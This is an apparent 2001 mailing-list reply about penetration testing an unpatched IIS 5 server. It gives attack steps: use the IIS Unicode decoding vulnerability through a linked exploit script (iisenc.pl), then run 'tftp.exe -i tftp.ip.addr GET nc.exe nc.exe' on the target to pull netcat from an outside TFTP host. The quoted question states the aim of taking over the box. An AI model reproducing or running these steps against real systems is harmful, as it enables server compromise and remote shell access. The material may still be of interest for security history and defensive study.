RE: pen testing iis 5

From: dilbert96at_private
Date: Sat Jun 23 2001 - 03:05:51 PDT

    Hi,

    In most cases I find the easiest way to upload files is tftp. There are
    loads of tftp server programs however I recommend tftpd32 (attached). use
    Unicode or escaped characters decoding vulnerability
    http://www.sec-1.com/iisenc.zip and use

    tftp.exe -i tftp.ip.addr GET nc.exe nc.exe

    With iisenc.pl use

    cmd /c> \\
    Enter alternative command e.g. net.exe, tftp.exe >tftp.exe
    tftp.exe>-i tftp.ip.addr GET nc.exe nc.exe

    Regards

    Gary O'leary-Steele

    WinNT 4.0
    > with no fixes.  At
    > this point I want to upload a file to the box
    [nc.exe] and then I will
    > definately have the box.  How can I go about doing
    this?

    Free, encrypted, secure Web-based email at www.hushmail.com

    IMPORTANT NOTICE:  If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.